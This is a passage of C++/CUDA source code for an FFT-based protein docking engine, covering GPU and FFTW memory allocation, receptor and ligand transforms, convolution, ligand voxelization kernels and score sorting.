= _Num_fft * _Num_fft * _Num_fft;\n const int num_sort = _parameter->_Num_sort;\n const int num_angle = _parameter->_Num_rot_angles;\n const int no = _parameter->_Num_output;\n const size_t nproc2 = _parallel->nproc2();\n int num_toprank;\n\n num_toprank = num_angle * num_sort;\n if( no > num_toprank ) num_toprank = no;\n\n alloc_fft();\n\n _Select.resize(nproc2);\n for( int i = 0 ; i < nproc2 ; i++ ) {\n _Select[i].resize(num_sort);\n }\n\n _Top.resize(num_toprank);\n\n //---------- memory allocation for _Current_rot_angle_num\n _Current_rot_angle_num = new int[nproc2];\n\n _cputime->record_malloc( sizeof(float)*nf3*2*(1 + nproc2));\n\n //---------- memory allocation for _FFT_rec_r\n _FFT_rec_r = new float[nf3];\n if( !_FFT_rec_r ) {\n cerr << \"[ERROR] Out of memory. 
Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_r) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n //---------- memory allocation for _FFT_rec_i\n _FFT_rec_i = new float[nf3];\n if( !_FFT_rec_i ) {\n cerr << \"[ERROR] Out of memory. Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_i) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::alloc_fft()\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const int na = _ligand->num_atoms();\n size_t myid2;\n\n#ifdef CUFFT\n const int num_sort = _parameter->_Num_sort;\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nag = na * ng1;\n //for ligand voxelization on GPU\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n CUFFTin_host = new cufftComplex[nf3];\n CUFFTout_host = new cufftComplex[nf3];\n\n _cputime->record_malloc( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n\n //printf(\" start: %p\\n\",&CUFFTin_host[0].x);\n\n /*\n for( int i = 0 ; i < nf3; i++ ) { // This initialization should be executed only once\n if(i<20)printf(\" %p %p\\n\",&CUFFTin_host[i].x,&CUFFTin_host[i].y);\n if(i>nf3-20)printf(\" %p %p\\n\",&CUFFTin_host[i].x,&CUFFTin_host[i].y);\n CUFFTin_host[i] = make_cuComplex(0.0, 0.0);\n CUFFTin_host[i].x = 0.0;\n CUFFTin_host[i].y = 0.0;\n }\n //*/\n\n int lenCUFFTin_host = (int)(((long int)&CUFFTin_host[nf3-1].x) - ((long int)&CUFFTin_host[0].x) + sizeof(CUFFTin_host[nf3-1]))/sizeof(CUFFTin_host[nf3-1]);\n if(lenCUFFTin_host !=nf3) printf(\"# discontinuous memory allocation occurs\\n\");\n\n //printf(\" end: %ld\\n\",(long long int)&CUFFTin_host[nf3-1].y - &CUFFTin_host[0].x);\n\n cufft_plan = new cufftHandle[num_gpu];\n cufft_result = new cufftResult[num_gpu];\n\n CUFFTin_gpu = new cufftComplex*[num_gpu];\n CUFFTout_gpu = new cufftComplex*[num_gpu];\n _FFT_rec_r_gpu = new float*[num_gpu];\n _FFT_rec_i_gpu = new float*[num_gpu];\n\n grid_r_gpu = new float*[num_gpu];\n grid_i_gpu = new float*[num_gpu];\n grid_coord_gpu = new float*[num_gpu];\n radius_core2_gpu = new float*[num_gpu];\n radius_surf2_gpu = new float*[num_gpu];\n _Charge_gpu = new float*[num_gpu];\n xd_gpu = new float*[num_gpu];\n yd_gpu = new float*[num_gpu];\n zd_gpu = new float*[num_gpu];\n atom_coord_rotated_gpu = new float*[num_gpu];\n atom_coord_orig_gpu = new float*[num_gpu];\n mole_center_coord_gpu = new float*[num_gpu];\n ligand_rotation_angle_gpu = new float*[num_gpu];\n top_score_gpu = new float*[num_gpu];\n top_index_gpu = new int*[num_gpu];\n top_score_host = new float*[num_gpu];\n top_index_host = new int*[num_gpu];\n\n\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(gpu_id);\n cufft_result[gpu_id] = cufftPlan3d(&cufft_plan[gpu_id], nf1, nf1, nf1, CUFFT_C2C);\n\n checkCudaErrors( cudaMalloc((void **)&CUFFTin_gpu[gpu_id], sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&CUFFTout_gpu[gpu_id], sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_r_gpu[gpu_id], sizeof(float)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_i_gpu[gpu_id], sizeof(float)*nf3) );\n\n checkCudaErrors( cudaMalloc((void **)&grid_r_gpu[gpu_id], sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void 
**)&grid_i_gpu[gpu_id], sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_coord_gpu[gpu_id], sizeof(float)*ng1));\n checkCudaErrors( cudaMalloc((void **)&radius_core2_gpu[gpu_id], sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&radius_surf2_gpu[gpu_id], sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&_Charge_gpu[gpu_id], sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&xd_gpu[gpu_id], sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&yd_gpu[gpu_id], sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&zd_gpu[gpu_id], sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_rotated_gpu[gpu_id], sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_orig_gpu[gpu_id], sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&mole_center_coord_gpu[gpu_id], sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&ligand_rotation_angle_gpu[gpu_id], sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&top_score_gpu[gpu_id], sizeof(float)*nBlocks_nf3*num_sort) );\n checkCudaErrors( cudaMalloc((void **)&top_index_gpu[gpu_id], sizeof(int)*nBlocks_nf3*num_sort) );\n\n top_score_host[gpu_id] = new float[nBlocks_nf3];\n top_index_host[gpu_id] = new int[nBlocks_nf3];\n\n }\n\n _cputime->record_malloc( sizeof(float)*nBlocks_nf3*num_gpu + sizeof(int)*nBlocks_nf3*num_gpu );\n\n //*\n size_t devmem_use, devmem_free, devmem_total;\n cudaMemGetInfo(&devmem_free, &devmem_total);\n devmem_use = devmem_total - devmem_free;\n printf(\"# GPU Memory : Use %3.1f MB (%4.1f%%), Free %3.1f MB (%4.1f%%), Total %3.1f MB\\n\",(float)devmem_use/1024.0/1024.0,(float)(100*devmem_use/devmem_total), (float)devmem_free/1024.0/1024.0, (float)(100*devmem_free/devmem_total), (float)devmem_total/1024.0/1024.0);\n //*/\n\n#endif /* CUFFT */\n\n _FFTWin = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3*nproc2);\n _FFTWout = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3*nproc2);\n\n plan_fftw_forward = new fftwf_plan[nproc2];\n plan_fftw_inverse = new fftwf_plan[nproc2];\n\n #pragma omp parallel private(myid2) num_threads(nproc2) //limit num of procs\n {\n myid2 = omp_get_thread_num();\n #pragma omp for\n for(int id = 0; id < nproc2; id++) {\n #pragma omp critical\n {\n plan_fftw_forward[myid2]=fftwf_plan_dft_3d(nf1,nf1,nf1,&_FFTWin[nf3*myid2],&_FFTWout[nf3*myid2],FFTW_FORWARD,FFTW_ESTIMATE);\n plan_fftw_inverse[myid2]=fftwf_plan_dft_3d(nf1,nf1,nf1,&_FFTWin[nf3*myid2],&_FFTWout[nf3*myid2],FFTW_BACKWARD,FFTW_ESTIMATE);\n }\n }\n }\n\n _cputime->record_malloc( sizeof(fftwf_complex)*nf3*2*nproc2 );\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::receptor_fft(float *grid_r,float *grid_i)\n//============================================================================//\n{\n const int num_grid= _Num_fft / 2;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - num_grid ) / 2;\n const float theta = -2.0 * PI / _Num_fft;\n\n const int num_gpu = _parallel->num_gpu();\n\n if(num_gpu > 0) {\n#ifdef CUFFT\n int myid2;\n struct timeval et1, et2;\n //memset(CUFFTin_host[0], make_cuComplex(0.0, 0.0), sizeof(cufftComplex)*nf3);\n for( int i = 0 ; i < nf3 ; i++ ) {\n CUFFTin_host[i] = make_cuComplex(0.0, 0.0);\n }\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n for( int k = 0 ; k < 
num_grid ; k++ ) {\n CUFFTin_host[jc+k+ndata] = make_cuComplex(grid_r[m ], grid_i[m]);\n m++;\n }\n }\n }\n\n cudaSetDevice(0); //CUFFTin_dev[0] : [0] means 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpy(CUFFTin_gpu[0], CUFFTin_host, sizeof(cufftComplex)*nf3, cudaMemcpyHostToDevice) );\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n fft3d(theta,0); // [0] means performed on 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpy(CUFFTout_host,CUFFTout_gpu[0],sizeof(cufftComplex)*nf3,cudaMemcpyDeviceToHost) );\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = cuCrealf(CUFFTout_host[i]);\n _FFT_rec_i[i] = cuCimagf(CUFFTout_host[i]);\n }\n\n gettimeofday(&et1,NULL);\n\n #pragma omp parallel private(myid2) num_threads(num_gpu)\n {\n myid2 = omp_get_thread_num();\n #pragma omp for\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(myid2);\n checkCudaErrors( cudaMemcpy(_FFT_rec_r_gpu[myid2], _FFT_rec_r, sizeof(float)*nf3, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(_FFT_rec_i_gpu[myid2], _FFT_rec_i, sizeof(float)*nf3, cudaMemcpyHostToDevice) );\n }\n }\n\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n#endif\n } else {\n memset(_FFTWin, 0.0, sizeof(fftwf_complex)*nf3);\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n\n for( int k = 0 ; k < num_grid ; k++ ) {\n _FFTWin[jc+k+ndata][0] = grid_r[m ];\n _FFTWin[jc+k+ndata][1] = grid_i[m++];\n }\n }\n }\n\n fft3d(theta,0);\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = _FFTWout[i][0];\n _FFT_rec_i[i] = _FFTWout[i][1];\n }\n }\n\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::ligand_preparation(float *grid_r,float *grid_i, size_t myid2)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int nf2 = _Num_fft * _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - ng1 ) / 2;\n \n memset(_FFTWin[nf3*myid2], 0.0, sizeof(fftwf_complex)*nf3);\n \n for( int i = 0, m = 0 ; i < ng1 ; i++ ) {\n const int ic = nf2*(i+ndata);\n\n for( int j = 0 ; j < ng1 ; j++ ) {\n int jc = ic + _Num_fft*(j+ndata);\n \n for( size_t k = 0, myijk=nf3*myid2+jc+ndata ; k < ng1 ; k++, myijk++ ) {\n _FFTWin[myijk][0] = grid_r[m ];\n _FFTWin[myijk][1] = grid_i[m++];\n }\n }\n }\n \n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::convolution(size_t myid2)\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1*nf1;\n const size_t nf3 = nf1*nf2;\n\n for( size_t i = 0, j=nf3*myid2 ; i < nf3 ; i++,j++ ) {\n _FFTWin[j][0] = _FFT_rec_r[i]*_FFTWout[j][0] + _FFT_rec_i[i]*_FFTWout[j][1];\n _FFTWin[j][1] = _FFT_rec_r[i]*_FFTWout[j][1] - _FFT_rec_i[i]*_FFTWout[j][0];\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::fft3d(const float &theta, size_t 
myid2)\n//============================================================================//\n{ \n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n struct timeval et3, et4;\n\n if(myid2 < num_gpu) {\n#ifdef CUFFT\n const int nf1 = _Num_fft;\n cufftHandle plan;\n cufftResult res;\n\n res = cufftPlan3d(&plan, nf1, nf1, nf1, CUFFT_C2C);\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to plan 3d FFT (DFT):\" << res << endl;\n exit(-1);\n }\n\n if( theta < 0.0 ) {\n res = cufftExecC2C(plan, &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_FORWARD);\n } else {\n res = cufftExecC2C(plan, &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_INVERSE);\n }\n\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT(in fft3d()):\" << res << endl;\n exit(-1);\n }\n\n res = cufftDestroy(plan);\n#endif\n } else {\n gettimeofday(&et3,NULL);\n if( _parameter->fft_library_type == 2 ) { \n\t} else {\n if( theta < 0.0 ) {\n fftwf_execute(plan_fftw_forward[myid2]);\n } else {\n fftwf_execute(plan_fftw_inverse[myid2]);\n }\n }\n gettimeofday(&et4,NULL);\n //printf(\" [FFT(host),%s] %10.5f\\n\\n\",((theta<0.0)?\"Forward\":\"Inverse\"),(et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6)));\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::score_sort(size_t myid2)\n//============================================================================//\n{\n const int num_sort = _parameter->_Num_sort;\n const int nf2 = _Num_fft * _Num_fft;\n const int nf3 = _Num_fft * _Num_fft * _Num_fft;\n float temp_top_score;\n int temp_top_index;\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[myid2][i].score = -99999.0;\n }\n\n fftwf_complex *fftout;\n fftout = _FFTWout;\n \n if(num_sort!=1) {\n for( size_t i = 0,myi= nf3*myid2 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0] / nf3;\n if( raw < _Select[myid2][num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[myid2][j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[myid2][k] = _Select[myid2][k-1];\n }\n _Select[myid2][j].score = raw;\n _Select[myid2][j].index[1] = i / nf2;\n _Select[myid2][j].index[2] = (i / _Num_fft) % _Num_fft;\n _Select[myid2][j].index[3] = i % _Num_fft;\n break;\n }\n }\n }\n } else { // num_sort = 1, take only 1 score per angle\n temp_top_score = 0.0;\n temp_top_index = 0;\n for( size_t i = 0, myi=nf3*myid2 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0];\n if (temp_top_score < raw) {\n temp_top_score = raw;\n temp_top_index = i;\n }\n }\n _Select[myid2][0].score = temp_top_score / nf3;\n _Select[myid2][0].index[1] = temp_top_index / nf2;\n _Select[myid2][0].index[2] = (temp_top_index / _Num_fft) % _Num_fft;\n _Select[myid2][0].index[3] = temp_top_index % _Num_fft;\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n //printf(\" top %d %f\\n\",i,_Select[myid2][i].score);\n _Select[myid2][i].index[0] = _Current_rot_angle_num[myid2];\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Top[_Current_rot_angle_num[myid2]*num_sort+i] = _Select[myid2][i];\n }\n\n return;\n}\n\n#ifdef CUFFT\n//============================================================================//\nvoid FFTProcessPDB::cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2)\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t 
nf3 = nf2 * nf1;\n\n const int num_sort = _parameter->_Num_sort;\n const int na = _ligand->num_atoms();\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n if(myid2==0) gettimeofday(&et1,NULL);\n\n float temp_top_score = -999999.0;\n int temp_top_index = -999999;\n\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n cudaSetDevice(myid2);\n //printf(\" #p10 [myid=%d]\\n\",myid2);\n\n ligand_voxelization_on_gpu(theta,myid2);\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n if(myid2==0) gettimeofday(&et1,NULL);\n\n cufft_result[myid2] = cufftExecC2C(cufft_plan[myid2], &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_FORWARD);\n if(!cufft_result[myid2] == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT (DFT, Lig):\" << cufft_result[myid2] << endl;\n exit(-1);\n }\n\n //*/\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_2_fftprocess_ligand_fft += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n if(myid2==0) gettimeofday(&et1,NULL);\n convolution_gpu<<<nBlocks_nf3, nThreads>>>(nf3, _FFT_rec_r_gpu[myid2], _FFT_rec_i_gpu[myid2], CUFFTout_gpu[myid2], CUFFTin_gpu[myid2]);\n\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_3_fftprocess_convolution += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n if(myid2==0) gettimeofday(&et1,NULL);\n\n cufft_result[myid2] = cufftExecC2C(cufft_plan[myid2], &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_INVERSE);\n if(!(cufft_result[myid2] == CUFFT_SUCCESS)) {\n cout << \"!fail to exec 3d FFT (IDFT):\" << cufft_result[myid2] << endl;\n exit(-1);\n }\n //*\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_4_fftprocess_fft_inverse += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n if(myid2==0) gettimeofday(&et1,NULL);\n\n // Search max score translation position from CUFFTout_gpu[nf3]\n\n //printf(\" t=%d per angle\\n\",num_sort);\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[myid2][i].score = -99999.0;\n }\n\n max_pos_single<<<nBlocks_nf3, nThreads, sizeof(float)*nThreads>>>(nf3, CUFFTout_gpu[myid2], top_score_gpu[myid2], top_index_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(myid2==0) gettimeofday(&et3,NULL);\n checkCudaErrors( cudaMemcpy(top_score_host[myid2],top_score_gpu[myid2],sizeof(float)*nBlocks_nf3,cudaMemcpyDeviceToHost) );\n checkCudaErrors( cudaMemcpy(top_index_host[myid2],top_index_gpu[myid2],sizeof(int)*nBlocks_nf3,cudaMemcpyDeviceToHost) );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t6_data_transfer_in_loop += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n checkCudaErrors( cudaDeviceSynchronize() );\n\n if(num_sort!=1) {\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[myid2][i]/nf2 > nf1 || top_index_host[myid2][i] < 0){\n top_score_host[myid2][i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[myid2][i]/nf2, 
top_score_host[myid2][i]);\n }\n const float raw = top_score_host[myid2][i];\n if( raw < _Select[myid2][num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[myid2][j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[myid2][k] = _Select[myid2][k-1];\n }\n const int index = top_index_host[myid2][i];\n _Select[myid2][j].score = raw;\n _Select[myid2][j].index[1] = index / nf2;\n _Select[myid2][j].index[2] = (index / _Num_fft) % _Num_fft;\n _Select[myid2][j].index[3] = index % _Num_fft;\n break;\n }\n }\n }\n\n } else { // num_sort = 1, select only 1 score per 1 ligand angle\n for(int i=0; i<nBlocks_nf3; i++) {\n if(top_index_host[myid2][i]/nf2 > nf1 || top_index_host[myid2][i] < 0){\n top_score_host[myid2][i] = -99999.99;\n //printf(\" error, %d | score, %f \\n\", top_index_host[myid2][i]/nf2, top_score_host[myid2][i]);\n }\n if(temp_top_score < top_score_host[myid2][i]) {\n temp_top_score = top_score_host[myid2][i];\n temp_top_index = top_index_host[myid2][i];\n }\n }\n\n //printf(\" m:%f\\n\\n\",temp_top_score);\n //printf(\"%g (%d) [%d %d %d]\\n\", temp_top_score, _p, temp_top_index/(n*n),(temp_top_index/n)%n, temp_top_index%n );\n //printf(\"<%d> %g (%d/%d) %d\\n\", nBlocks,temp_top_score, temp_top_index, nf3, temp_top_index/nf2);\n\n _Select[myid2][0].score = temp_top_score;\n _Select[myid2][0].index[1] = temp_top_index / nf2;\n _Select[myid2][0].index[2] = (temp_top_index / nf1) % nf1;\n _Select[myid2][0].index[3] = temp_top_index % nf1;\n /* / DEBUG\n printf(\"TEST, %d\\n\", _Select[myid2][0].index[1]);\n if ( _Select[myid2][0].index[1] > nf1 ){\n printf(\" error, %d\\n\", _Select[myid2][0].index[1]);\n }*/\n\n }\n\n //*** score_sort ***********************************************************\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[myid2][i].index[0] = _Current_rot_angle_num[myid2];\n _Top[_Current_rot_angle_num[myid2]*num_sort+i] = _Select[myid2][i];\n }\n\n //size_t devmem_use, devmem_free, devmem_total;\n //cudaMemGetInfo(&devmem_free, &devmem_total);\n //devmem_use = devmem_total - devmem_free;\n //printf(\" [GPU (%d) memory] Use : %10u (%4.1f%%), Free : %10u (%4.1f%%), Total : %10u\\n\",myid2,devmem_use,(float)(100*devmem_use/devmem_total), devmem_free, (float)(100*devmem_free/devmem_total), devmem_total);\n\n\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_5_fftprocess_score_sort += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n return;\n}\n\n\n//============================================================================//\nvoid FFTProcessPDB::ligand_voxelization_on_gpu(float *theta, size_t myid2)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n\n const float delta = 1.0;\n const float surface = 1.0;\n const float grid_width = _parameter->grid_width;\n const int sr_half = (2.4 + grid_width - 0.01) / grid_width;\n const int sr = 2 * sr_half + 1;\n\n const int na = _ligand->num_atoms();\n const int nag = na * ng1;\n const int na_sr3 = na * sr * sr * sr;\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n\n const int nThreads = NUM_THREADS;\n //const int nBlocks_na = (na + (nThreads-1)) / nThreads;\n const int nBlocks_nag = (nag + (nThreads-1)) / nThreads;\n const int nBlocks_na_sr3 = (na_sr3 + (nThreads-1)) / nThreads;\n const int 
nBlocks_ng3 = (ng3 + (nThreads-1)) / nThreads;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , nf3=nBlocks_nf3*nThreads\\n\",nf3,nBlocks_nf3,nThreads);\n fprintf(stderr, \" [ERROR] too large FFT size. nf3:%d, nBlocks_nf3:%d\\n\", nf3, nBlocks_nf3);\n exit(1);\n }\n\n //*\n //transfer ligand angle & calc xd,yd,zd,atom_coord_rotated\n if(myid2==0) gettimeofday(&et3,NULL);\n\n if(myid2==0) gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpy(ligand_rotation_angle_gpu[myid2], theta, sizeof(float)*3, cudaMemcpyHostToDevice) );\n if(myid2==0) gettimeofday(&et2,NULL);\n if(myid2==0) _cputime->t3_1_ligand_voxelization += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n //lig_rotation<<<nBlocks_na, nThreads>>>(na, ligand_rotation_angle_gpu[myid2],atom_coord_orig_gpu[myid2], mole_center_coord_gpu[myid2], atom_coord_rotated_gpu[myid2]);\n //checkCudaErrors( cudaDeviceSynchronize() );\n //lig_calc_dis_atomgrid<<<nBlocks_nag, nThreads>>>(na, ng1, xd_gpu[myid2], yd_gpu[myid2], zd_gpu[myid2], grid_coord_gpu[myid2], atom_coord_rotated_gpu[myid2]);\n //checkCudaErrors( cudaDeviceSynchronize() );\n ligvoxgpu_copy_htod<<<nBlocks_nag, nThreads>>>\n (na, ligand_rotation_angle_gpu[myid2], ng1, atom_coord_orig_gpu[myid2], mole_center_coord_gpu[myid2], atom_coord_rotated_gpu[myid2], xd_gpu[myid2], yd_gpu[myid2], zd_gpu[myid2], grid_coord_gpu[myid2]);\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_1_ligvoxgpu_copy_htod += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //grid[] initialize\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_init<<<nBlocks_nf3, nThreads>>>(ng3,nf3,grid_r_gpu[myid2],grid_i_gpu[myid2],CUFFTin_gpu[myid2]);\n //lig_vox_init_fft<<<nBlocks_nf3, nThreads>>>(nf3,CUFFTin_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_2_ligvoxgpu_kernel_init += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(core)\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads>>>\n (ng1,na,delta,radius_core2_gpu[myid2],xd_gpu[myid2],yd_gpu[myid2],zd_gpu[myid2],grid_coord_gpu[myid2],atom_coord_rotated_gpu[myid2],grid_r_gpu[myid2], grid_width);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_3_ligvoxgpu_kernel_fill_core += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //surface cutting\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_surface_cut_CtoT<<<nBlocks_ng3, nThreads>>>(ng1,delta,grid_r_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_4_ligvoxgpu_kernel_cut_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //atom fill(surf)\n if(myid2==0) gettimeofday(&et3,NULL);\n lig_vox_fill<<<nBlocks_na_sr3, nThreads>>>\n (ng1,na,surface,radius_surf2_gpu[myid2],xd_gpu[myid2],yd_gpu[myid2],zd_gpu[myid2],grid_coord_gpu[myid2],atom_coord_rotated_gpu[myid2],grid_r_gpu[myid2], grid_width);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_5_ligvoxgpu_kernel_fill_surf += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //electro\n if(myid2==0) gettimeofday(&et3,NULL);\n\n if(_parameter->lig_elec_serial_flag == 0) {\n 
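// Electrostatics: both kernel variants below spread the ligand atomic charges\n        // (_Charge_gpu) onto the ng1^3 grid grid_i_gpu, which is carried as the\n        // imaginary part of the FFT input. lig_vox_elec_serial is selected via the\n        // -S option (lig_elec_serial_flag, see parameter_table.cpp); the kernel\n        // bodies live in cuda_kernel.cu, so how the serial variant differs is not\n        // visible from the prototypes in cuda_kernel.h.\n        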
